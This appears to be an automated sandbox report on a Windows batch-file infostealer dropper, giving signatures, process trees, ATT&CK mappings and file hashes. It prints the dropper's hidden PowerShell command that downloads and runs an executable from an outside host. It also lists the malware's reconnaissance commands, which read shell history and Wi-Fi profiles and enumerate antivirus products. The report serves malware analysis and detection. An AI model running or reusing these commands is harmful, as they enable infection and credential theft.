Analysis
-
max time kernel
929s -
max time network
828s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
26/07/2024, 17:48
Static task
static1
Behavioral task
behavioral1
Sample
frdddd.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
frdddd.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
frdddd.bat
Resource
win11-20240709-en
General
-
Target
frdddd.bat
-
Size
255B
-
MD5
7cfc0e137d5d8b7f808add077083360b
-
SHA1
af7b34d385fdfcb6c1e0b37ce3908dcc437f3da9
-
SHA256
596217a3228f37bd8ac0ea92db6fc1b9fab378b96aea86ecd72e822809d948c5
-
SHA512
9b02fec89d4dfe4982a824c6b2f3c345c670285718e04c81d0e39e463e9d8f366fff04d892aea6464ef6a644c791aa86429c67e1411bfba6935385f047098ae0
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1272 powershell.exe -
pid Process 1272 powershell.exe 1272 powershell.exe 3244 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 2964 services.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "C:\\Users\\Admin\\AppData\\Local\\Temp\\services" services.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 58 ipinfo.io 49 ipinfo.io 51 ipinfo.io 57 ipinfo.io -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1268 tasklist.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 3344 2964 WerFault.exe 106 -
System Location Discovery: System Language Discovery 1 TTPs 27 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language services.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systeminfo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1204 cmd.exe 2336 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3400 cmd.exe 2916 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3064 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3096 systeminfo.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2196 NOTEPAD.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2336 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1272 powershell.exe 1272 powershell.exe 1272 powershell.exe 1272 powershell.exe 2964 services.exe 2964 services.exe 3688 powershell.exe 3688 powershell.exe 3688 powershell.exe 3244 powershell.exe 3244 powershell.exe 3244 powershell.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1388 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1272 powershell.exe Token: SeIncreaseQuotaPrivilege 3540 WMIC.exe Token: SeSecurityPrivilege 3540 WMIC.exe Token: SeTakeOwnershipPrivilege 3540 WMIC.exe Token: SeLoadDriverPrivilege 3540 WMIC.exe Token: SeSystemProfilePrivilege 3540 WMIC.exe Token: SeSystemtimePrivilege 3540 WMIC.exe Token: SeProfSingleProcessPrivilege 3540 WMIC.exe Token: SeIncBasePriorityPrivilege 3540 WMIC.exe Token: SeCreatePagefilePrivilege 3540 WMIC.exe Token: SeBackupPrivilege 3540 WMIC.exe Token: SeRestorePrivilege 3540 WMIC.exe Token: SeShutdownPrivilege 3540 WMIC.exe Token: SeDebugPrivilege 3540 WMIC.exe Token: SeSystemEnvironmentPrivilege 3540 WMIC.exe Token: SeRemoteShutdownPrivilege 3540 WMIC.exe Token: SeUndockPrivilege 3540 WMIC.exe Token: SeManageVolumePrivilege 3540 WMIC.exe Token: 33 3540 WMIC.exe Token: 34 3540 WMIC.exe Token: 35 3540 WMIC.exe Token: 36 3540 WMIC.exe Token: SeIncreaseQuotaPrivilege 3540 WMIC.exe Token: SeSecurityPrivilege 3540 WMIC.exe Token: SeTakeOwnershipPrivilege 3540 WMIC.exe Token: SeLoadDriverPrivilege 3540 WMIC.exe Token: SeSystemProfilePrivilege 3540 WMIC.exe Token: SeSystemtimePrivilege 3540 WMIC.exe Token: SeProfSingleProcessPrivilege 3540 WMIC.exe Token: SeIncBasePriorityPrivilege 3540 WMIC.exe Token: SeCreatePagefilePrivilege 3540 WMIC.exe Token: SeBackupPrivilege 3540 WMIC.exe Token: SeRestorePrivilege 3540 WMIC.exe Token: SeShutdownPrivilege 3540 WMIC.exe Token: SeDebugPrivilege 3540 WMIC.exe Token: SeSystemEnvironmentPrivilege 3540 WMIC.exe Token: SeRemoteShutdownPrivilege 3540 WMIC.exe Token: SeUndockPrivilege 3540 WMIC.exe Token: SeManageVolumePrivilege 3540 WMIC.exe Token: 33 3540 WMIC.exe Token: 34 3540 WMIC.exe Token: 35 3540 WMIC.exe Token: 36 3540 WMIC.exe Token: SeIncreaseQuotaPrivilege 3364 WMIC.exe Token: SeSecurityPrivilege 3364 WMIC.exe Token: SeTakeOwnershipPrivilege 3364 WMIC.exe Token: SeLoadDriverPrivilege 3364 WMIC.exe Token: SeSystemProfilePrivilege 3364 WMIC.exe Token: SeSystemtimePrivilege 3364 WMIC.exe Token: SeProfSingleProcessPrivilege 3364 WMIC.exe Token: SeIncBasePriorityPrivilege 3364 WMIC.exe Token: SeCreatePagefilePrivilege 3364 WMIC.exe Token: SeBackupPrivilege 3364 WMIC.exe Token: SeRestorePrivilege 3364 WMIC.exe Token: SeShutdownPrivilege 3364 WMIC.exe Token: SeDebugPrivilege 3364 WMIC.exe Token: SeSystemEnvironmentPrivilege 3364 WMIC.exe Token: SeRemoteShutdownPrivilege 3364 WMIC.exe Token: SeUndockPrivilege 3364 WMIC.exe Token: SeManageVolumePrivilege 3364 WMIC.exe Token: 33 3364 WMIC.exe Token: 34 3364 WMIC.exe Token: 35 3364 WMIC.exe Token: 36 3364 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe 1388 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2892 wrote to memory of 1272 2892 cmd.exe 85 PID 2892 wrote to memory of 1272 2892 cmd.exe 85 PID 1272 wrote to memory of 2964 1272 powershell.exe 106 PID 1272 wrote to memory of 2964 1272 powershell.exe 106 PID 1272 wrote to memory of 2964 1272 powershell.exe 106 PID 2964 wrote to memory of 1204 2964 services.exe 107 PID 2964 wrote to memory of 1204 2964 services.exe 107 PID 2964 wrote to memory of 1204 2964 services.exe 107 PID 1204 wrote to memory of 2336 1204 cmd.exe 108 PID 1204 wrote to memory of 2336 1204 cmd.exe 108 PID 1204 wrote to memory of 2336 1204 cmd.exe 108 PID 2964 wrote to memory of 1268 2964 services.exe 109 PID 2964 wrote to memory of 1268 2964 services.exe 109 PID 2964 wrote to memory of 1268 2964 services.exe 109 PID 1268 wrote to memory of 3540 1268 cmd.exe 110 PID 1268 wrote to memory of 3540 1268 cmd.exe 110 PID 1268 wrote to memory of 3540 1268 cmd.exe 110 PID 2964 wrote to memory of 3656 2964 services.exe 111 PID 2964 wrote to memory of 3656 2964 services.exe 111 PID 2964 wrote to memory of 3656 2964 services.exe 111 PID 3656 wrote to memory of 3364 3656 cmd.exe 112 PID 3656 wrote to memory of 3364 3656 cmd.exe 112 PID 3656 wrote to memory of 3364 3656 cmd.exe 112 PID 2964 wrote to memory of 2984 2964 services.exe 113 PID 2964 wrote to memory of 2984 2964 services.exe 113 PID 2964 wrote to memory of 2984 2964 services.exe 113 PID 2984 wrote to memory of 3064 2984 cmd.exe 114 PID 2984 wrote to memory of 3064 2984 cmd.exe 114 PID 2984 wrote to memory of 3064 2984 cmd.exe 114 PID 2964 wrote to memory of 1736 2964 services.exe 115 PID 2964 wrote to memory of 1736 2964 services.exe 115 PID 2964 wrote to memory of 1736 2964 services.exe 115 PID 1736 wrote to memory of 4640 1736 cmd.exe 116 PID 1736 wrote to memory of 4640 1736 cmd.exe 116 PID 1736 wrote to memory of 4640 1736 cmd.exe 116 PID 2964 wrote to memory of 3096 2964 services.exe 117 PID 2964 wrote to memory of 3096 2964 services.exe 117 PID 2964 wrote to memory of 3096 2964 services.exe 117 PID 3096 wrote to memory of 1688 3096 cmd.exe 118 PID 3096 wrote to memory of 1688 3096 cmd.exe 118 PID 3096 wrote to memory of 1688 3096 cmd.exe 118 PID 2964 wrote to memory of 5076 2964 services.exe 119 PID 2964 wrote to memory of 5076 2964 services.exe 119 PID 2964 wrote to memory of 5076 2964 services.exe 119 PID 5076 wrote to memory of 3776 5076 cmd.exe 126 PID 5076 wrote to memory of 3776 5076 cmd.exe 126 PID 5076 wrote to memory of 3776 5076 cmd.exe 126 PID 2964 wrote to memory of 3520 2964 services.exe 123 PID 2964 wrote to memory of 3520 2964 services.exe 123 PID 2964 wrote to memory of 3520 2964 services.exe 123 PID 3520 wrote to memory of 3688 3520 cmd.exe 124 PID 3520 wrote to memory of 3688 3520 cmd.exe 124 PID 3520 wrote to memory of 3688 3520 cmd.exe 124 PID 2964 wrote to memory of 544 2964 services.exe 127 PID 2964 wrote to memory of 544 2964 services.exe 127 PID 2964 wrote to memory of 544 2964 services.exe 127 PID 544 wrote to memory of 1268 544 cmd.exe 128 PID 544 wrote to memory of 1268 544 cmd.exe 128 PID 544 wrote to memory of 1268 544 cmd.exe 128 PID 2964 wrote to memory of 920 2964 services.exe 129 PID 2964 wrote to memory of 920 2964 services.exe 129 PID 2964 wrote to memory of 920 2964 services.exe 129 PID 920 wrote to memory of 3096 920 cmd.exe 130 PID 920 wrote to memory of 3096 920 cmd.exe 130
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "$tempFile = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'services.exe'); Invoke-WebRequest -Uri 'https://pomf2.lain.la/f/fx2lvav.img' -OutFile $tempFile; Start-Process $tempFile -NoNewWindow -Wait"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Users\Admin\AppData\Local\Temp\services.exe"C:\Users\Admin\AppData\Local\Temp\services.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\SysWOW64\PING.EXEping -n 1 1.1.1.15⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2336
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get name4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:3064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get name4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic cpu get name5⤵
- System Location Discovery: System Language Discovery
PID:4640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value5⤵
- System Location Discovery: System Language Discovery
PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get currentrefreshrate4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get currentrefreshrate5⤵
- System Location Discovery: System Language Discovery
PID:3776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell Get-Content (Get-PSReadlineOption).HistorySavePath4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-Content (Get-PSReadlineOption).HistorySavePath5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo5⤵
- System Location Discovery: System Language Discovery
- Gathers system information
PID:3096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh wlan show profile4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3400 -
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /value4⤵
- System Location Discovery: System Language Discovery
PID:3828 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /value5⤵
- System Location Discovery: System Language Discovery
PID:4264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe -Command "Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation"4⤵
- System Location Discovery: System Language Discovery
PID:5112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3244
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 11724⤵
- Program crash
PID:3344
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2136
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:3776
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x494 0x4541⤵PID:3636
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\1IWDmrphZKxrlSMC\Exceptions.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2196
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2964 -ip 29641⤵PID:2984
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
2Remote System Discovery
1System Information Discovery
3System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
2Internet Connection Discovery
1Wi-Fi Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5c580727fc0a7a733ea6a446b67ca63f7
SHA1ebdd57fca25df0f759dec07c5382d560df7600c2
SHA256369ef9ccfc9923d44f390840e46cc948796bb79bec86644402608e9a8af80073
SHA5122a1aba5dfe194d53ce71cafb94d147999968aa0a7e5bd1db069da62ab3e06f475af77c258532647dcb7370f4e12c188b99624fc5a9c7c44f196c98e9d2b12733
-
Filesize
1KB
MD53f9471c349b1f3de27e640979fa4c2cd
SHA1a387f843f5717aaab62c172839f365668a69d0b6
SHA2560b1e1805b4a0043da17906a1c1a800fdb35ac3130d8d6b747a2c03d0ee458973
SHA51287c2278b751ee1cff920cab744747c90348b276dfeb938fa426f33ae6c3fa70a4e3dbae3ed5169b153f9c6b4b844790f923fe332a8125bf9111bb2bf8d0458f4
-
Filesize
20KB
MD543fb4c3431d333e211203b8b7b7091d5
SHA17cc7932de4bf095fc70dbe3fd68c41ad92ba22e0
SHA256fad93544286f033ebe4b786f7ff5f5bd35d0cfd10acc01f7a089d1747f396b45
SHA512659f7f7b135508ebf8389ac15ec1f935d6aeb4320be4947c5fd8e593befc7444141e249e8d35029979cf989829dc6e3f59afcb90975cb46695c9f1dc69955edc
-
Filesize
8KB
MD5c1b2e5790cbc36c8d732bafad920c24c
SHA1cd235bb8abee255db783e7c6390a599022ae17fd
SHA25606afdd368fdf472f0841302fe7853567dee32b4d8d638a57cb7c2a284438a391
SHA512974c3929312f5f198a7e94ac3748925fbacd55259c38f179c849fbefb12682010e0faf3a588f3a031448628960211809169436ee714d04d835aaf9d312925a51
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4.5MB
MD5b85914d36703377812cba113ca4638b7
SHA13c68a49b599dac13f4cb7cd327ad7c9c15313381
SHA2562ef086862494efd63cfacf30753bb2df9dd55f18d04e71fb912e79d47657b9d3
SHA51245ae20f08b16c8056cf4cd5a7e65f4f6b593cf41ca63431d0db153ddcfbbf28b1bff92800093cf48ca4b66c35afd3a626862559a247052b2ff5dc4c426a29a07